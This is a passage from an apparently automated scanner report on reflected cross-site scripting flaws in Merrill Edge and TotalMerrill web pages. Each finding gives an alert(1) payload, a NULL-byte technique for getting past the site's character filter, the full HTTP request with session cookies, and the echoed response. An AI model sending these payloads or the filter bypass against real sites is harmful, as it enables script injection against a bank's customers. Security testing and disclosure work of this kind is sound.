SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:00:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 66193
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><!-- Thank you for using ...[SNIP]... <![CDATA[ var SPC = { 'Tactic' : 'BAC1.9496e';13da8abd038' ,'Page' : 'self-directed-investing' ,'preview' : false }; //]]> ...[SNIP]...
2.51. http://www.merrilledge.com/m/pages/site-map.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.merrilledge.com
Path:
/m/pages/site-map.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007d9f5"><script>alert(1)</script>2905fed108 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7d9f5"><script>alert(1)</script>2905fed108 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/site-map.aspx?%007d9f5"><script>alert(1)</script>2905fed108=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B87218; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:01:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 68142
2.52. http://www.merrilledge.com/m/pages/why-merrill-edge.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.merrilledge.com
Path:
/m/pages/why-merrill-edge.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00dda62"><script>alert(1)</script>11a3ea3bfd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dda62"><script>alert(1)</script>11a3ea3bfd7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/why-merrill-edge.aspx?%00dda62"><script>alert(1)</script>11a3ea3bfd7=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B87218; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:00:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 91468
2.53. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.merrilledge.com
Path:
/m/pages/zero-dollar-trades.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006ed48"><script>alert(1)</script>70a6192c756 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6ed48"><script>alert(1)</script>70a6192c756 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/zero-dollar-trades.aspx?cm_sp=GWM-MerrillEdge-_-BAU%20Homepage%20CMS%20Default%20Ads-_-GZ16LT000X_HP-Def-Highlight_gwim-024_hlt_direct-v3_arq031i4.jpg&%006ed48"><script>alert(1)</script>70a6192c756=1 HTTP/1.1 Host: www.merrilledge.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
2.54. https://www.merrilledge.com/M/pages/home.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.merrilledge.com
Path:
/M/pages/home.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003fb18"><script>alert(1)</script>14202c14d95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3fb18"><script>alert(1)</script>14202c14d95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /M/pages/home.aspx?%003fb18"><script>alert(1)</script>14202c14d95=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B87218; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:01:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 94802
2.55. http://www.totalmerrill.com/TotalMerrill/Pages/Webcast_Retire_0410_TM.aspx&title=Merrill%20Lynch%20Retirement%20Webcast&sms_ss=1&username=merrilllynch [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0024fb1'-alert(1)-'d949b17af26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 24fb1'-alert(1)-'d949b17af26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /TotalMerrill/Pages/Webcast_Retire_0410_TM.aspx&title=Merrill%20Lynch%20Retirement%20Webcast&sms_ss=1&username=merrilllynch?%0024fb1'-alert(1)-'d949b17af26=1 HTTP/1.1 Host: www.totalmerrill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cmRS=&t1=1290629615462&t2=1290629622849&t3=1290629625312&fti=1290629625311&fn=GWMMktTotalMerrillWhatMatters_aspnetForm%3A0%3B&ac=-1:U&fd=0%3A2%3ASearch_btn%3B&uer=&fu=&pi=GWM%3AMkt%3ATotalMerrill%3BWhatMatters&ho=data.coremetrics.com/eluminate%3F&ci=90010394; SMIDENTITY=ManMRSApMfVqCg2gEn/wcCCTiry10p9BiZfhZaPx4bYEWKW58yF6tzT15FJJQ2FAt4H8k2zJyZJtJG/dc3Ey1zHbBw8IaCzvrRHspWcHDB1CaiAzwtm/tv99NF1V27YTbVLkacReBQ70Q5zoTYIDlFoEKPrNiBcMnl7Hylj1rKO39W60OnvPJYw/8pGkwqkjzX5vJVeiwA4goDU9eiJ3kI3JVQ0SYyaTlWuM1QsN7VaQZi9uYqNjW0QV2eSXHoZ94T/fg5eUph1R3BggynIQvjFaJItV766OpqHscaYnd/Hofgmi2E7Cl7TBO/2Xdzcc2mas3IT0N/SB5XlXib50qQJ07G/ZqaI8YapZ+xImxk/DmZTYzu15dVlJu5Pfv0ju24FDjIV4ayd2BfvEdi9H1zSCNMNLj+cZB9MTCp/WHquxEN+CjORKbhmmykBIzGZcr7hyndo493ao+fjqQ2I7ZGhfODvkmURghPmjf971ztE6Hm2ORbBCi1cADwUWrYq0iMPxRN8k0UmrkxX4fRQVZjfae2wVmXRF2V/wAEOUW2q4IkhdnqftwMLUNlNEHSAtKQzgWln7Ax015VlkRRue354zaJW0U9pks+BZVzrFu/Ewj/yB3DU5+qMJHtN7EEF4; __utmz=15720499.1290629618.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CMAVID=none; cmTPSet=Y; __utma=15720499.1423148302.1290629618.1290629618.1290629618.1; __utmc=15720499; __utmb=15720499.2.10.1290629618; TM_PUID=a2ab9bd9-cdc6-433c-a6b3-026bcadf396d;
Response
HTTP/1.1 404 Not Found Cache-Control: no-cache Pragma: no-cache Content-Length: 15942 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Wed, 24 Nov 2010 20:41:35 GMT
The value of the fatype request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %001b86a'%3balert(1)//1ac2a8de344 was submitted in the fatype parameter. This input was echoed as 1b86a';alert(1)//1ac2a8de344 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /TotalMerrill/system/FABranchLocator.aspx?ddwnSearchType=BRANCH&fatype=wm%001b86a'%3balert(1)//1ac2a8de344 HTTP/1.1 Host: www.totalmerrill.com Proxy-Connection: keep-alive Referer: http://www.totalmerrill.com/TotalMerrill/system/ContactMLFindBranchOrFAModal.aspx?modal=findBranch Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SMIDENTITY=ManMRSApMfVqCg2gEn/wcCCTiry10p9BiZfhZaPx4bYEWKW58yF6tzT15FJJQ2FAt4H8k2zJyZJtJG/dc3Ey1zHbBw8IaCzvrRHspWcHDB1CaiAzwtm/tv99NF1V27YTbVLkacReBQ70Q5zoTYIDlFoEKPrNiBcMnl7Hylj1rKO39W60OnvPJYw/8pGkwqkjzX5vJVeiwA4goDU9eiJ3kI3JVQ0SYyaTlWuM1QsN7VaQZi9uYqNjW0QV2eSXHoZ94T/fg5eUph1R3BggynIQvjFaJItV766OpqHscaYnd/Hofgmi2E7Cl7TBO/2Xdzcc2mas3IT0N/SB5XlXib50qQJ07G/ZqaI8YapZ+xImxk/DmZTYzu15dVlJu5Pfv0ju24FDjIV4ayd2BfvEdi9H1zSCNMNLj+cZB9MTCp/WHquxEN+CjORKbhmmykBIzGZcr7hyndo493ao+fjqQ2I7ZGhfODvkmURghPmjf971ztE6Hm2ORbBCi1cADwUWrYq0iMPxRN8k0UmrkxX4fRQVZjfae2wVmXRF2V/wAEOUW2q4IkhdnqftwMLUNlNEHSAtKQzgWln7Ax015VlkRRue354zaJW0U9pks+BZVzrFu/Ewj/yB3DU5+qMJHtN7EEF4; TM_PUID=a2ab9bd9-cdc6-433c-a6b3-026bcadf396d; CMAVID=none; cmTPSet=Y; __utmz=15720499.1290629618.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=15720499.1423148302.1290629618.1290629618.1290629618.1; __utmc=15720499; __utmb=15720499.1.10.1290629618
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 11795 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Wed, 24 Nov 2010 20:39:46 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <hea ...[SNIP]... <script type='text/javascript'> FAType = 'WM.1B86A';ALERT(1)//1AC2A8DE344'</script> ...[SNIP]...
2.57. http://www.totalmerrill.com/TotalMerrill/system/SearchResults.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.totalmerrill.com
Path:
/TotalMerrill/system/SearchResults.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0027d67'-alert(1)-'0d16634420 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 27d67'-alert(1)-'0d16634420 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /TotalMerrill/system/SearchResults.aspx?%0027d67'-alert(1)-'0d16634420=1 HTTP/1.1 Host: www.totalmerrill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cmRS=&t1=1290629615462&t2=1290629622849&t3=1290629625312&fti=1290629625311&fn=GWMMktTotalMerrillWhatMatters_aspnetForm%3A0%3B&ac=-1:U&fd=0%3A2%3ASearch_btn%3B&uer=&fu=&pi=GWM%3AMkt%3ATotalMerrill%3BWhatMatters&ho=data.coremetrics.com/eluminate%3F&ci=90010394; SMIDENTITY=ManMRSApMfVqCg2gEn/wcCCTiry10p9BiZfhZaPx4bYEWKW58yF6tzT15FJJQ2FAt4H8k2zJyZJtJG/dc3Ey1zHbBw8IaCzvrRHspWcHDB1CaiAzwtm/tv99NF1V27YTbVLkacReBQ70Q5zoTYIDlFoEKPrNiBcMnl7Hylj1rKO39W60OnvPJYw/8pGkwqkjzX5vJVeiwA4goDU9eiJ3kI3JVQ0SYyaTlWuM1QsN7VaQZi9uYqNjW0QV2eSXHoZ94T/fg5eUph1R3BggynIQvjFaJItV766OpqHscaYnd/Hofgmi2E7Cl7TBO/2Xdzcc2mas3IT0N/SB5XlXib50qQJ07G/ZqaI8YapZ+xImxk/DmZTYzu15dVlJu5Pfv0ju24FDjIV4ayd2BfvEdi9H1zSCNMNLj+cZB9MTCp/WHquxEN+CjORKbhmmykBIzGZcr7hyndo493ao+fjqQ2I7ZGhfODvkmURghPmjf971ztE6Hm2ORbBCi1cADwUWrYq0iMPxRN8k0UmrkxX4fRQVZjfae2wVmXRF2V/wAEOUW2q4IkhdnqftwMLUNlNEHSAtKQzgWln7Ax015VlkRRue354zaJW0U9pks+BZVzrFu/Ewj/yB3DU5+qMJHtN7EEF4; __utmz=15720499.1290629618.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CMAVID=none; cmTPSet=Y; __utma=15720499.1423148302.1290629618.1290629618.1290629618.1; __utmc=15720499; __utmb=15720499.2.10.1290629618; TM_PUID=a2ab9bd9-cdc6-433c-a6b3-026bcadf396d;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 8921 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Wed, 24 Nov 2010 20:42:10 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head ...[SNIP]... <script type="text/javascript" language="javascript">g_ml_tm_jsLib_1_0.writeErrorMessage('9aa21b2c-c59a-4d19-93ff-b5b1ef84de34', '/totalmerrill/system/searchresults.aspx?%0027d67'-alert(1)-'0d16634420=1', "Exception of type 'System.Web.HttpUnhandledException' was thrown.");</script> ...[SNIP]...
2.58. http://www.totalmerrill.com/webcasts/2010/conservatism/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.totalmerrill.com
Path:
/webcasts/2010/conservatism/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00d0b61'-alert(1)-'a3940798f8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d0b61'-alert(1)-'a3940798f8c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /webcasts/2010/conservatism/?%00d0b61'-alert(1)-'a3940798f8c=1 HTTP/1.1 Host: www.totalmerrill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cmRS=&t1=1290629615462&t2=1290629622849&t3=1290629625312&fti=1290629625311&fn=GWMMktTotalMerrillWhatMatters_aspnetForm%3A0%3B&ac=-1:U&fd=0%3A2%3ASearch_btn%3B&uer=&fu=&pi=GWM%3AMkt%3ATotalMerrill%3BWhatMatters&ho=data.coremetrics.com/eluminate%3F&ci=90010394; SMIDENTITY=ManMRSApMfVqCg2gEn/wcCCTiry10p9BiZfhZaPx4bYEWKW58yF6tzT15FJJQ2FAt4H8k2zJyZJtJG/dc3Ey1zHbBw8IaCzvrRHspWcHDB1CaiAzwtm/tv99NF1V27YTbVLkacReBQ70Q5zoTYIDlFoEKPrNiBcMnl7Hylj1rKO39W60OnvPJYw/8pGkwqkjzX5vJVeiwA4goDU9eiJ3kI3JVQ0SYyaTlWuM1QsN7VaQZi9uYqNjW0QV2eSXHoZ94T/fg5eUph1R3BggynIQvjFaJItV766OpqHscaYnd/Hofgmi2E7Cl7TBO/2Xdzcc2mas3IT0N/SB5XlXib50qQJ07G/ZqaI8YapZ+xImxk/DmZTYzu15dVlJu5Pfv0ju24FDjIV4ayd2BfvEdi9H1zSCNMNLj+cZB9MTCp/WHquxEN+CjORKbhmmykBIzGZcr7hyndo493ao+fjqQ2I7ZGhfODvkmURghPmjf971ztE6Hm2ORbBCi1cADwUWrYq0iMPxRN8k0UmrkxX4fRQVZjfae2wVmXRF2V/wAEOUW2q4IkhdnqftwMLUNlNEHSAtKQzgWln7Ax015VlkRRue354zaJW0U9pks+BZVzrFu/Ewj/yB3DU5+qMJHtN7EEF4; __utmz=15720499.1290629618.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CMAVID=none; cmTPSet=Y; __utma=15720499.1423148302.1290629618.1290629618.1290629618.1; __utmc=15720499; __utmb=15720499.2.10.1290629618; TM_PUID=a2ab9bd9-cdc6-433c-a6b3-026bcadf396d;
Response
HTTP/1.1 404 Not Found Cache-Control: no-cache Pragma: no-cache Content-Length: 16714 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Wed, 24 Nov 2010 20:42:47 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head ...[SNIP]... <script type="text/javascript" language="javascript">g_ml_tm_jsLib_1_0.handleHttpStatusError('IIS', '404;http://www.totalmerrill.com:80/webcasts/2010/conservatism/?%00d0b61'-alert(1)-'a3940798f8c=1', "");</script> ...[SNIP]...
2.59. http://www.totalmerrill.com/webcasts/2010/conservatism/video/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.totalmerrill.com
Path:
/webcasts/2010/conservatism/video/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00e906f'-alert(1)-'d27b8e30bf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e906f'-alert(1)-'d27b8e30bf9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
